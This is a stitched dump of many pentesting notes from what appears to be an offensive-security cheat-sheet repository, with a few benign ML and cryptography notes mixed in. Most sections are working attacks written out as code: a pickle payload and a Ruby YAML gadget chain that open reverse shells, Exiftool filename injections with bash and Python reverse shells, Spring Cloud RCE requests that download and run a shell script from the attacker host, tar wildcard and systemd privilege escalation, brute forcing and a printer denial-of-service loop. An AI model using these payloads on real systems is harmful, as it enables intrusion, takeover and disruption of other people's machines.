Unzip 2 | 3 | Zip is a command-line tool used for creating and manipulating compressed archive files in Unix, Linux, and other Unix-like operating systems. 4 | 5 | ## Compress 6 | 7 | ```sh 8 | zip ... 9 | 10 | zip example.zip example1.txt example2.txt 11 | # -r: recursive (zip folder) 12 | zip -r example.zip ./example 13 | ``` 14 | 15 | ### Symbolic Links 16 | 17 | We can store symbolic links in a zip file. 18 | 19 | ```php 20 | ln -s /etc/passwd test.txt 21 | zip --symlink test.zip test.txt 22 | ``` 23 | 24 | ## Decompress 25 | 26 | ```sh 27 | unzip example.zip 28 | # Specify the directory to decompress 29 | unzip example.zip -d ./example 30 | ``` 31 | 32 | ### List Files without Decompressings 33 | 34 | To list files in a zip file without extracting, use **`-l`** flag. 35 | 36 | ```bash 37 | unzip -l example.zip 38 | ``` 39 | 40 | ## Unzip with Python 41 | 42 | Also we can decompress an archived file using Python script. 43 | 44 | ```py 45 | import zipfile 46 | 47 | filename = "./sample.zip" 48 | extdir = "./" 49 | password = "password123" 50 | 51 | with zipfile.ZipFile(filename, 'r') as zp: 52 | try: 53 | zp.extractall(path=extdir, pwd=password.encode('utf-8')) 54 | except RuntimeError as e: 55 | print(e) 56 | ``` 57 | -------------------------------------------------------------------------------- /docs/exploit/web/webanno.md: -------------------------------------------------------------------------------- 1 | # WebAnno Pentesting 2 | 3 | WebAnno is a web-based annotation tool for a wide range of linguistic annotations. The server uses the port 8080. 4 | 5 | ## Default Credentials 6 | 7 | ```bash 8 | admin:admin 9 | ``` 10 | 11 | ## Reverse Shell 12 | 13 | If the target system opens the website assoated with WebAnno service, we can execute reverse shell by uploading the payload and access to the webpage hosts the payload. 14 | 15 | ### 1. Go to the Upload Screen in Dashboard 16 | 17 | 1. Login 18 | 2. Click “Projects”. 19 | 3. Select the project in left pane. 20 | 4. Click Documents tab. 21 | 22 | ### 2. Prepare Payload 23 | 24 | WebAnno allows us to upload arbitrary file format, so we can upload PHP file for reverse shell. 25 | 26 | ```bash 27 | wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php 28 | vim shell.php 29 | 30 | # Edit $ip and $port in editor. 31 | ``` 32 | 33 | Then start listener in local machine. 34 | 35 | ```sh 36 | nc -lvnp 4444 37 | ``` 38 | 39 | ### 3. Upload the Payload 40 | 41 | In WebAnno dashboard, upload the PHP file in the Documents page. 42 | 43 | ### 4. Access to the Payload File in Another Server 44 | 45 | For instance, access to http://sub.example.com/path/to/shell.php, we can get a shell in the local terminal. -------------------------------------------------------------------------------- /docs/exploit/hardware/sal-logic-analysis.md: -------------------------------------------------------------------------------- 1 | # SAL Logic Analysis 2 | 3 | A SAL file is a capture file in Saleae Logic Analyzer. 4 | 5 | ## Analysis 6 | 7 | **[Saleae's Logic Analyzer](https://www.saleae.com/)** is a tool for hardware analysis. 8 | Download **Logic 2** and start it. 9 | 10 | ```sh 11 | chmod +x ./Logic-x.x.x-master.AppImage 12 | ./Logic-x.x.x-master.AppImage 13 | ``` 14 | 15 | In the analyzer, click **"Open a capture"** and select the target file such as **".sal"**. 16 | Open **"Analyzer"** tab on the right of the windows and click on the **"Async Serial"**. 17 | The dialog opens, then configure some value e.g. **`Bit Rate`**. And click save button. 18 | 19 | After configuration, we can see the data analyzed in the Data section. Click the terminal icon then we can see what data was transmitted. 20 | To add another Async Serial analyer, click the “+” icon on the right of the Analyzers header. 21 | 22 | ## Read Code 23 | 24 | 1. Click **File → Export Data** then select **CSV** in the Export Raw Data popup. 25 | 2. Click **Export**. 26 | 27 | ## Calculate Bit Rate from Intervals 28 | 29 | ```txt 30 | Bit rate (bit/s) = 1 second / (interval(microseconds) x 10^(-6)) seconds 31 | ``` 32 | 33 | ## References 34 | 35 | - [Saleae Support](https://support.saleae.com/user-guide/using-logic/using-protocol-analyzers) 36 | -------------------------------------------------------------------------------- /docs/exploit/web/framework/pickle-rce.md: -------------------------------------------------------------------------------- 1 | # Python Pickle RCE 2 | 3 | The python “pickle” module, that serializes and deserializes a Python object, is vulnerable to remote code execution. If the website uses this module, we may be able to execute arbitrary code. 4 | 5 | ## Exploitation 6 | 7 | Below is the Python script (**`mypickle.py`**) to generate the payload to reverse shell. 8 | 9 | ```python 10 | import pickle 11 | import base64 12 | import os 13 | 14 | class RCE: 15 | def __reduce__(self): 16 | cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4444 > /tmp/f') 17 | return os.system, (cmd,) 18 | 19 | if __name__ == '__main__': 20 | pickled = pickle.dumps(RCE()) 21 | print(base64.b64encode(pickled)) 22 | # or 23 | print(base64.urlsafe_b64encode(pickled)) 24 | ``` 25 | 26 | Now run this script to generate the Base64 payload. 27 | 28 | ```bash 29 | python3 mypickle.py 30 | ``` 31 | 32 | Copy the ourput base64 string and paste it to where the payload affects in website. 33 | Before reloading the web page, start a listener in local machine. 34 | 35 | ```bash 36 | nc -lvnp 4444 37 | ``` 38 | 39 | Then reload the page. We should get a shell in local terminal. 40 | 41 | ## References 42 | 43 | - [David Hamann](https://davidhamann.de/2020/04/05/exploiting-python-pickle/) -------------------------------------------------------------------------------- /docs/exploit/network/protocol/snmp.md: -------------------------------------------------------------------------------- 1 | # SNMP (Simple Network Management Protocol) Pentesting 2 | 3 | SNMP is an internet standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. It uses UDP. A default port is 161. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap -sU --script snmp-info -p 161 9 | nmap -sU --script snmp-interfaces -p 161 10 | nmap -sU --script snmp-processes -p 161 11 | nmap -sU --script snmp-sysdescr -p 161 12 | nmap -sU --script snmp* -p 161 13 | 14 | # For SNMP v1 15 | # -c: Community name 16 | snmpwalk -v1 -c public -m ALL : 17 | # For SNMP v2 18 | snmpwalk -v2c -c public -m ALL : 19 | # For SNMP v3 20 | # -l: Security level. 'noAuthNoPriv', 'authNoPriv', 'authPriv'. 21 | snmpwalk -v3 -l noAuthNoPriv -c public -m ALL : 22 | 23 | # -c: community 24 | # -p: port 25 | snmp-check -p 161 -c public 26 | ``` 27 | 28 | ### Brute Force the Community Names 29 | 30 | ```sh 31 | hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp 32 | 33 | onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 34 | ``` 35 | 36 | ## Configuration Files 37 | 38 | ```bash 39 | cat /etc/snmp/snmpd.conf 40 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/key-derivation-functions/bcrypt.md: -------------------------------------------------------------------------------- 1 | # Bcrypt 2 | 3 | Bcrypt is a password-hashing function based on the Blowfish cipher. 4 | 5 | ## Using Bcrypt in Python 6 | 7 | Reference: [https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#bcrypt](https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#bcrypt) 8 | 9 | To create a bcrypt hash, 10 | 11 | ```python 12 | from base64 import b64encode 13 | from Crypto.Hash import SHA256 14 | from Crypto.Protocol.KDF import bcrypt 15 | 16 | password = b"secret" 17 | b64pwd = b64encode(SHA256.new(password).digest()) 18 | bcrypt_hash = bcrypt(b64pwd, 12) 19 | print(f"hash: {bcrypt_hash}") 20 | ``` 21 | 22 | To check them, 23 | 24 | ```python 25 | from base64 import b64encode 26 | from Crypto.Hash import SHA256 27 | from Crypto.Protocol.KDF import bcrypt, bcrypt_check, _bcrypt_hash 28 | 29 | password = b"secret" 30 | # Specify the hash generated 31 | bcrypt_hash = b"$2a$12$F86jMkaNbEm8lPm6q6zbCuiIGOAsz4azBZkAeSalFYXjctIjiQG1C" 32 | 33 | try: 34 | b64pwd = b64encode(SHA256.new(password).digest()) 35 | bcrypt_check(b64pwd, bcrypt_hash) 36 | print("Password is correct") 37 | except ValueError: 38 | print("Incorrect password") 39 | ``` 40 | 41 | ## References 42 | 43 | - [PyCryptodome](https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#bcrypt) 44 | -------------------------------------------------------------------------------- /docs/exploit/web/microsoft-exchange-server.md: -------------------------------------------------------------------------------- 1 | # Microsoft Exchange Server Pentesting 2 | 3 | Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft. 4 | 5 | ## Enumeration 6 | 7 | ### OWA (Outlook Web Access) 8 | 9 | ```bash 10 | msfconsole 11 | # Client Access Server (CAS) IIS HTTP Internal IP Disclosure 12 | msf> use auxiliary/scanner/http/owa_iis_internal_ip 13 | # Brute Force credentials 14 | msf> use auxiliary/scanner/http/owa_login 15 | ``` 16 | 17 | ## Common Directories 18 | 19 | ```bash 20 | # Autodiscover service 21 | /autodiscover/ 22 | /autodiscover/autodiscover.xml 23 | # Enhanced Client or Proxy 24 | /ecp/ 25 | # Exchange Web Services 26 | /ews/ 27 | # Offline Address Books 28 | /oab/ 29 | # Outlook Web Access 30 | /owa/ 31 | /owa/auth/login.aspx 32 | ``` 33 | 34 | ## ProxyShell RCE 35 | 36 | CVE-2021-31207, CVE-2021-34523, CVE-2021-34473 37 | Reference: [https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/](https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/) 38 | 39 | ```bash 40 | msfconsole 41 | msf> use exploit/windows/http/exchange_proxyshell_rce 42 | msf> (set options...) 43 | msf> exploit 44 | meterpreter> shell 45 | ``` 46 | 47 | ## References 48 | 49 | - [Microsoft Learn](https://learn.microsoft.com/en-us/exchange/architecture/architecture?view=exchserver-2019) -------------------------------------------------------------------------------- /docs/exploit/machine-learning/read-hdf5.md: -------------------------------------------------------------------------------- 1 | # Read HDF5 (H5) File 2 | 3 | HDF5 is a file format of the HDF (Hierarchical Data Format) which is designed to store and organize large amounts of data. 4 | 5 | ## TensorFlow 6 | 7 | ```python 8 | import tensorflow as tf 9 | 10 | model = tf.keras.models.load_model("example.h5") 11 | model.summary() 12 | ``` 13 | 14 | ## h5py 15 | 16 | **h5py** is the Python library to read and write HDF5 files. 17 | 18 | ### Installation 19 | 20 | ```bash 21 | pip3 install h5py 22 | ``` 23 | 24 | ### Read HDF5 (H5) 25 | 26 | Then run the following script. 27 | 28 | ```python 29 | import h5py 30 | 31 | with h5py.File('example.hdf5', 'r') as f: 32 | # Get all keys 33 | print("All keys: %s" % f.keys()) 34 | # Get an object 35 | print("Object: " % f["key_name"]) 36 | print("Object keys: " % f["key_name"].keys()) 37 | print("Sub object: " % f["key_name"]["sub_key_name"]) 38 | ``` 39 | 40 | ### Write HDF5 (H5) 41 | 42 | ```python 43 | import h5py 44 | import numpy as np 45 | 46 | data_matrix = np.random.uniform(-1, 1, size=(10, 3)) 47 | 48 | with h5py.File('example.hdf5', 'w') as f: 49 | f.create_dataset("dataset_name", data=data_matrix) 50 | ``` 51 | 52 | ## References 53 | 54 | - [h5py](https://docs.h5py.org/en/latest/quick.html) 55 | - [StackOverflow](https://stackoverflow.com/questions/28170623/how-to-read-hdf5-files-in-python) 56 | -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/ruby.md: -------------------------------------------------------------------------------- 1 | # Ruby Privilege Escalation 2 | 3 | Ruby is an interpreted, high-level, general-purpose programming language. 4 | 5 | ## Remote Code Execution with YAML 6 | 7 | Check if the current user could run the ruby script as root privilege. 8 | 9 | ```txt 10 | (root) NOPASSWD: /usr/bin/ruby sample.rb 11 | ``` 12 | 13 | If the sample.rb contains the “File.read(’sample.yml’)”, modify the YAML file as follow: 14 | 15 | ```yml 16 | --- 17 | - !ruby/object:Gem::Installer 18 | i: x 19 | - !ruby/object:Gem::SpecFetcher 20 | i: y 21 | - !ruby/object:Gem::Requirement 22 | requirements: 23 | !ruby/object:Gem::Package::TarReader 24 | io: &1 !ruby/object:Net::BufferedIO 25 | io: &1 !ruby/object:Gem::Package::TarReader::Entry 26 | read: 0 27 | header: "abc" 28 | debug_output: &1 !ruby/object:Net::WriteAdapter 29 | socket: &1 !ruby/object:Gem::RequestSet 30 | sets: !ruby/object:Net::WriteAdapter 31 | socket: !ruby/module 'Kernel' 32 | method_id: :system 33 | git_set: "bash -c 'bash -i >& /dev/tcp// 0>&1'" 34 | method_id: :resolve 35 | ``` 36 | 37 | Then start listener in local machine. 38 | 39 | ```sh 40 | nc -lvnp 41 | ``` 42 | 43 | Now run the sudo command. 44 | 45 | ```sh 46 | sudo /usr/bin/ruby sample.rb 47 | ``` -------------------------------------------------------------------------------- /docs/exploit/printer/ipp.md: -------------------------------------------------------------------------------- 1 | # IPP (Internet Printing Protocol) Pentesting 2 | 3 | IPP is a protocol for communicating between client devices and printers. A default port is 631. 4 | 5 | ## Access in Web Browser 6 | 7 | The CUPS server can be able to access via browser. 8 | Try input the following in the URL search form in browser. 9 | 10 | ```txt 11 | http://:631 12 | ``` 13 | 14 | ## Connect 15 | 16 | **[The Printer Exploitation Toolkit](https://github.com/RUB-NDS/PRET)** is a tool for printer secure testing. Assume that we use it. 17 | Try all three options until the target printer recognized. 18 | 19 | ```sh 20 | # ps: PostScript 21 | python2 pret.py :631 ps 22 | 23 | # pjl: Printer Job Language 24 | python2 pret.py :631 pjl 25 | 26 | # pcl: Printer Control Language 27 | python2 pret.py :631 pcl 28 | ``` 29 | 30 | ## Commands in PRET Shell 31 | 32 | After connecting the target printer, we can test using the following commands. 33 | 34 | ```sh 35 | # Print usage 36 | > ? 37 | > ? 38 | ``` 39 | 40 | ## Other Exploits 41 | 42 | ### Denial of Service (DoS) 43 | 44 | ```sh 45 | while true; do nc printer 9100; done 46 | ``` 47 | 48 | ## References 49 | 50 | - [TryHackMe](https://tryhackme.com/room/printerhacking101) 51 | - [Printer Security Testing Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet) -------------------------------------------------------------------------------- /docs/exploit/web/open-redirect.md: -------------------------------------------------------------------------------- 1 | # Open Redirect 2 | 3 | It accepts a user-controlled input that specifies a link to an external site and uses that link in a redirect. 4 | 5 | ## Payloads 6 | 7 | ```html 8 | https://vulnerable.com/example.php?redirectUrl=https://attacker.com/ 9 | https://vulnerable.com/example.php?redirectUrl=https:\\attacker.com\ 10 | https://vulnerable.com/example.php?redirectUrl=https://attacker.com#.vulnerable.com/ 11 | 12 | https://vulnerable.com/example.php?redirectUrl=https://attacker.com%E3%80%82%23.vulnerable.com/ 13 | 14 | https://vulnerable.com/example.php?redirectUrl=/%0d/attacker.com/ 15 | ``` 16 | 17 | ## Unrestricted QR Code Scanning 18 | 19 | Reference: [https://shahjerry33.medium.com/open-redirection-qr-code-magic-18ace1a0170f](https://shahjerry33.medium.com/open-redirection-qr-code-magic-18ace1a0170f) 20 | 21 | If website (or mobile application) has the function for scanning QR code but not restricts URL, we can let it to read malicious QR code. 22 | 23 | ### 1. Generate QR Code 24 | 25 | First, we need to create a malicious QR code. There are many online tools for generating it. 26 | 27 | ### 2. Read Malicious QR Code in the Application 28 | 29 | After generating the QR code, read the QR code in the target application. 30 | If the application does not validate the URL, we can access to the malicious URL. 31 | -------------------------------------------------------------------------------- /docs/exploit/machine-learning/data-processing/cluster-analysis.md: -------------------------------------------------------------------------------- 1 | # Cluster Analysis for Machine Learning 2 | 3 | We can find the number of clusters using methods such as K-means. 4 | 5 | ## Find Optimal Number of Clusters 6 | 7 | ### K-means & Elbow Curve 8 | 9 | Reference: [https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=39](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=39) 10 | 11 | 12 | We may find the optimal number of clusters by using **K-means** algorithm and observing the **Elbow** graph. 13 | 14 | ```python 15 | import numpy as np 16 | from sklearn.cluster import KMeans 17 | import matplotlib.pyplot as plt 18 | 19 | clusters = np.load("example.npy") 20 | 21 | # specify the range of the number of clusters 22 | K = range(1, 10) 23 | 24 | distortions = [] 25 | for i in K: 26 | kmeans = KMeans(n_clusters=i) 27 | kmeans.fit(clusters) 28 | distortions.append(kmeans.inertia_) 29 | 30 | plt.plot(K, distortions) 31 | plt.xlabel("Number of clusters") 32 | plt.ylabel("Distortion") 33 | ``` 34 | 35 | Seeing the output graph, the last point where the distortion (or inertia) drops sharply may be the optimal number of clusters. 36 | 37 | ## References 38 | 39 | - [Kaggle](https://www.kaggle.com/competitions/ai-village-ctf) 40 | - [GeeksForGeeks](https://www.geeksforgeeks.org/elbow-method-for-optimal-value-of-k-in-kmeans/) -------------------------------------------------------------------------------- /docs/exploit/network/protocol/vnc.md: -------------------------------------------------------------------------------- 1 | # VNC (Virtual Network Computing) Pentesting 2 | 3 | VNC is a graphical desktop sharing system that uses the Remote Frame Buffer protocol to remotely control another computer. Default ports are 5800, 5801, 5900, 5901. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script vnc-info -p 5900 9 | # RealVNC authentication bypass (CVE-2006-2369) 10 | nmap --script realvnc-auth-bypass -p 5900 11 | 12 | msf> use auxiliary/scanner/vnc/vnc_none_auth 13 | ``` 14 | 15 | ### Brute Force Credentials 16 | 17 | VNC server does not use the username, but only the password. 18 | 19 | ```sh 20 | hydra -P passwords.txt vnc:// 21 | hydra -P passwords.txt vnc 22 | ``` 23 | 24 | ## Connect 25 | 26 | ### Using Remmina 27 | 28 | ```sh 29 | remmina 30 | remmina -c vnc:// 31 | remmina -c vnc://username@vulnerable.com 32 | remmina -c vnc:vulnerable.com?VncUsername=username 33 | remmina -c vnc://username:password@vulnerable.com 34 | remmina -c vnc://vulnerable.com?VncUsername=username\&VncPassword=password 35 | ``` 36 | 37 | ### Using VNC Viewer 38 | 39 | If we don’t have `vncviewer`, install it first: 40 | 41 | ```bash 42 | sudo apt install tigervnc-viewer 43 | ``` 44 | 45 | Then run the following command to connect: 46 | 47 | ```bash 48 | vncviewwer 10.0.0.1:5901 49 | # with password file 50 | vncviewer -passwd ./passwd.txt 10.0.0.1:5901 51 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/tar-wildcard.md: -------------------------------------------------------------------------------- 1 | # Tar Wildcard Injection PrivEsc 2 | 3 | The `tar` command with wildcard injection may lead to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | For example, below command can be executed as root. 8 | 9 | ```sh 10 | sudo -l 11 | 12 | (root) NOPASSWD: /opt/backup/baskup.sh 13 | ``` 14 | 15 | ### Check If the File Contains Tar Command with Wildcards 16 | 17 | We need to check the content in the file. 18 | 19 | ```sh 20 | cat /opt/backup/backup.sh 21 | 22 | # -cf: create an archived file 23 | tar -cf backup.tar * 24 | ``` 25 | 26 | The above **tar** command means that it creates an arvhived file from any input file because it passes **wildcard (*)**. 27 | 28 | ## Exploitation 29 | 30 | Now create a payload for privilege escalation. 31 | 32 | ```sh 33 | cd /opt/backup 34 | echo -e '#!/bin/bash\n/bin/bash' > shell.sh 35 | echo "" > "--checkpoint-action=exec=sh shell.sh" 36 | echo "" > --checkpoint=1 37 | ``` 38 | 39 | We've created three files. 40 | 41 | ```sh 42 | ls /opt/backup 43 | 44 | shell.sh '--checkpoint-action=exec=sh shell.sh' '--checkpoint=1' 45 | ``` 46 | 47 | Now execute **"tar"** command as root with wildcard. 48 | 49 | ```sh 50 | sudo tar -cf example.tar * 51 | ``` 52 | Wait until **"tar"** command will be executed. 53 | After a while, we should see the current user switch to root. 54 | 55 | ```sh 56 | whoami 57 | root 58 | ``` -------------------------------------------------------------------------------- /docs/exploit/machine-learning/computer-vision/image-analysis.md: -------------------------------------------------------------------------------- 1 | # Image Analysis for Machine Learning 2 | 3 | Investigate images to get sensitive/secret data or sensitive information hidden in the images. 4 | 5 | In advance, load an image using **Pillow (PIL)**. 6 | 7 | ```py 8 | import numpy as np 9 | from PIL import Image 10 | 11 | img = Image.open("example.png") 12 | ``` 13 | 14 | ## Basic Information 15 | 16 | ```py 17 | # Filename 18 | img.filename 19 | 20 | # Image information 21 | img.info 22 | 23 | # Image format (PNG, JPG, etc.) 24 | img.format 25 | 26 | # Color mode (RPG, CMYK, etc.) 27 | img.mode 28 | 29 | # Image size 30 | img.size 31 | 32 | # Bytes 33 | img.tobytes() 34 | 35 | # Pixels 36 | np.array(img.getdata()) 37 | ``` 38 | 39 | ### Plot Images 40 | 41 | ```py 42 | import matplotlib.pyplot as plt 43 | 44 | plt.imshow(img) 45 | plt.axis('off') # Turn off axis and labels 46 | plt.show() 47 | ``` 48 | 49 | ## Hidden Information 50 | 51 | Find hidden data in the image by slightly changing. 52 | 53 | ### Resize Image & Get Bytes 54 | 55 | ```py 56 | img1 = img.resize((128, 128)) 57 | print(img1.tobytes()) 58 | ``` 59 | 60 | ### XOR Image Bytes 61 | 62 | ```py 63 | # Convert image to bytes 64 | bytes = img.tobytes() 65 | 66 | key = 2 # specify the XOR key 67 | 68 | xored = [] 69 | for byte in bytes: 70 | xored.append(byte ^ key) 71 | xored_np = np.array(xored) 72 | print(xored_np) 73 | ``` 74 | -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/ansible-vault-secret.md: -------------------------------------------------------------------------------- 1 | # Ansible Vault Secret 2 | 3 | Ansible Vault can encrypt a file which includes sensitive data. However, we may be able to decrypt the file with password or by cracking hash to retrieve password. 4 | 5 | ## Decryption 6 | 7 | First check the file encrypted with Ansible Vault. 8 | 9 | ```bash 10 | cat example.yml 11 | 12 | # -- output -- 13 | $ANSIBLE_VAULT;1.1;AES256 14 | 62313365396662343061393464336163383764373764613633653634306231386433626436623361 15 | 6134333665353966363534333632666535333761666131620a663537646436643839616531643561 16 | 63396265333966386166373632626539326166353965363262633030333630313338646335303630 17 | 3438626666666137650a353638643435666633633964366338633066623234616432373231333331 18 | 6564 19 | ``` 20 | 21 | We can use **`ansible2john`** to generate the hash to make it crackable. 22 | 23 | ```bash 24 | ansible2john example.yml > hash.txt 25 | ``` 26 | 27 | Then crack this hash using **John The Ripper** or **Hashcat**. 28 | 29 | ```bash 30 | john --wordlist=wordlist.txt hash.txt 31 | # or 32 | hashcat -a 0 -m 16900 hash.txt wordlist.txt 33 | ``` 34 | 35 | After cracking and retrieving the passwrod, we can use it to decrypt the file as below. 36 | 37 | ```bash 38 | ansible-vault decrypt example.yml --output decrypted.txt 39 | ``` 40 | 41 | ## References 42 | 43 | - [Ansible Docs](https://docs.ansible.com/ansible/2.9/user_guide/vault.html#) -------------------------------------------------------------------------------- /docs/exploit/hardware/firmware-analysis.md: -------------------------------------------------------------------------------- 1 | # Firmware Analysis 2 | 3 | ## Static Analysis 4 | 5 | The following tools are useful for static analysis. 6 | 7 | - **[Firmwalker](https://github.com/craigz28/firmwalker)** 8 | - **[firmware-mod-kit](https://code.google.com/archive/p/firmware-mod-kit/)** 9 | 10 | ```sh 11 | file ./firmware 12 | 13 | binwalk ./firmware 14 | # -M: Matryosika (recursively) scan extracted files 15 | # -r: Delete carved files after extracting 16 | # -e: Extract known file types 17 | binwalk -Mre ./firmware 18 | # -E: Calculate file entropy 19 | # -N: Do not generate an entropy plot graph 20 | binwalk -EN ./firmware 21 | 22 | # firmware-mod-kit 23 | ./extract-firmware.sh ./firmware 24 | ``` 25 | 26 | ## Dynamic Analysis 27 | 28 | ```sh 29 | gdb ./firmware 30 | rizin ./firmware 31 | ``` 32 | 33 | ### Using FIRMADYNE 34 | 35 | **[FIRMADYNE](https://github.com/firmadyne/firmadyne)** is a platform for emulation and dynamic analysis of Linux-based firmware. 36 | 37 | ```sh 38 | # Analyze and emulate the system 39 | ./fat.py example.squashfs 40 | ``` 41 | 42 | The analysis will start. 43 | Copy the ip address in the output as below. 44 | 45 | ```sh 46 | Network interfaces: [('brtrunk', '192.168.0.100')] 47 | ``` 48 | 49 | In local machine, port forward using the ip. 50 | 51 | ```sh 52 | ssh -L 8081:192.168.0.100:80 remote-user@ 53 | ``` 54 | 55 | Now we can access to http://127.0.0.1:8081/ -------------------------------------------------------------------------------- /docs/exploit/web/file-upload-attack-on-exiftool.md: -------------------------------------------------------------------------------- 1 | # File Upload Attack on Exiftool 2 | 3 | If website uses Exiftool to analyze uploaded files, we might be able to exploit the vulnerabilities. 4 | 5 | ## Polyglot Attack 6 | 7 | We might be able to execute remote code by polyglotting the original plain image file. 8 | At first, create a blank image file as below, but this step may be not required if you already have some image file. 9 | 10 | ```sh 11 | convert -size 32x32 xc:white test.jpg 12 | ``` 13 | 14 | Then insert **OS command** with **exiftool**. 15 | 16 | ```sh 17 | exiftool -Comment="" example.png 18 | exiftool -Comment='"; system($_GET['cmd']); ?>' exploit.png 19 | exiftool -Comment="" example.jpg -o polyglot.php 20 | ``` 21 | 22 | ## Command Injection (version < v12.38) 23 | 24 | On Exiftool version lower than **12.38**, we can inject **OS command** in the filename when uploading. 25 | 26 | ```bash 27 | # Ping 28 | filename="touch test; ping -c 1 10.0.0.1 |" 29 | 30 | # Reverse shell 31 | filename="touch test; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 |" 32 | filename="touch test; bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\" |" 33 | filename="touch test; python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.0.0.1\", 1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")' |" 34 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/framework/spring-cloud.md: -------------------------------------------------------------------------------- 1 | # Spring Cloud Function RCE 2 | 3 | Spring Cloud Function is vulnerable to RCE (CVE-2022-22963) 4 | 5 | ## Exploitation 6 | 7 | ### Reverse Shell 8 | 9 | First create a reverse shell script in local machine. 10 | 11 | ```bash 12 | #!/bin/bash 13 | bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 14 | ``` 15 | 16 | Then start a web server for uploading it. 17 | 18 | ```bash 19 | python3 -m http.server 20 | ``` 21 | 22 | Now remote code execution with target website as below. 23 | 24 | ```bash 25 | curl -X POST https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://10.0.0.1/shell -O /tmp/shell")' --data-raw 'data' -v 26 | ``` 27 | 28 | Our reverse shell script is uploaded. 29 | Start a listener in local machine. 30 | 31 | ```bash 32 | nc -lvnp 4444 33 | ``` 34 | 35 | Remote code execution again to reverse shell. 36 | 37 | ```bash 38 | # As needed 39 | curl -X POST https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/shell")' --data-raw 'data' -v 40 | 41 | curl -X POST https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /tmp/shell")' --data-raw 'data' -v 42 | ``` 43 | 44 | ## References 45 | 46 | - [me2nuk](https://github.com/me2nuk/CVE-2022-22963) -------------------------------------------------------------------------------- /docs/exploit/network/protocol/amqp.md: -------------------------------------------------------------------------------- 1 | # AMQP (Advanced Message Queuing Protocol) 2 | 3 | AMQP is an open standard application layer protocol. Defaults Ports are 5671, 5672. 4 | 5 | ## Connect 6 | 7 | We can use `rabbitmqctl` command for interacting with the AMQP server from remote machine. 8 | If it does not exist on your machine, install it with the following command: 9 | 10 | ```bash 11 | sudo apt install rabbitmq-server 12 | ``` 13 | 14 | Now we can use it. 15 | 16 | ```bash 17 | # Get status 18 | sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@ status 19 | 20 | # Get all users 21 | sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@ list_users 22 | 23 | # Dump user password hash (format: Base64 encoded RabbitMQ SHA-256) 24 | sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@ export_definitions /tmp/output.json 25 | ``` 26 | 27 | ## Get Password 28 | 29 | If we get the password hash after the `rabbitmqctl export_definitions` command, we can extract the password from it. The hash is Base64-encoded and the format is as below by default: 30 | 31 | ```bash 32 | BASE64(4_BYTE_SALT + SHA256(4_BYTE_SALT + PASSWORD)) 33 | ``` 34 | 35 | So extract the SHA256 hash with the following command: 36 | 37 | ```bash 38 | # cut -c9-: Output from the 9th character (to extract the first 4 bytes) 39 | echo -n '' | base64 -d | xxd -p -c 1000 | cut -c9- 40 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/reboot.md: -------------------------------------------------------------------------------- 1 | # Sudo Reboot Privilege Escalation 2 | 3 | The `sudo reboot` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | sudo -l 9 | 10 | (ALL) NOPASSWD: /usr/sbin/reboot 11 | ``` 12 | 13 | If we can execute **"reboot"** command as root, we can escalate to privileges. 14 | 15 | ## Exploitation 16 | 17 | ### 1. Find Service Config Files Which Are Writable 18 | 19 | We need to look for the system service config file which are writable. 20 | 21 | ```bash 22 | find / -writable -name "*.service" 2>/dev/null 23 | 24 | /etc/systemd/system/example.service 25 | ``` 26 | 27 | ### 2. Insert a Payload 28 | 29 | If we find a writable file, we can inject a payload into **Service.ExecStart**. 30 | 31 | ```bash 32 | # /etc/systemd/systm/example.service 33 | [Unit] 34 | Description=Zeno monitoring 35 | 36 | [Service] 37 | Type=simple 38 | User=root 39 | ExecStart=/bin/bash -c 'cp /bin/bash /home//bash; chmod +xs /home//bash' 40 | 41 | [Install] 42 | WantedBy=multi-user.target 43 | ``` 44 | 45 | ### 3. Reboot and Get a Root Shell 46 | 47 | Now reboot as root. 48 | 49 | ```bash 50 | sudo /usr/sbin/reboot 51 | ``` 52 | 53 | After the system rebooted, the command in the ExecStart will be executed. 54 | Now we should get a root shell by executing the copied bash command. 55 | 56 | ```bash 57 | /home//bash -p 58 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/python-jails-escape.md: -------------------------------------------------------------------------------- 1 | # Python Jails Escape 2 | 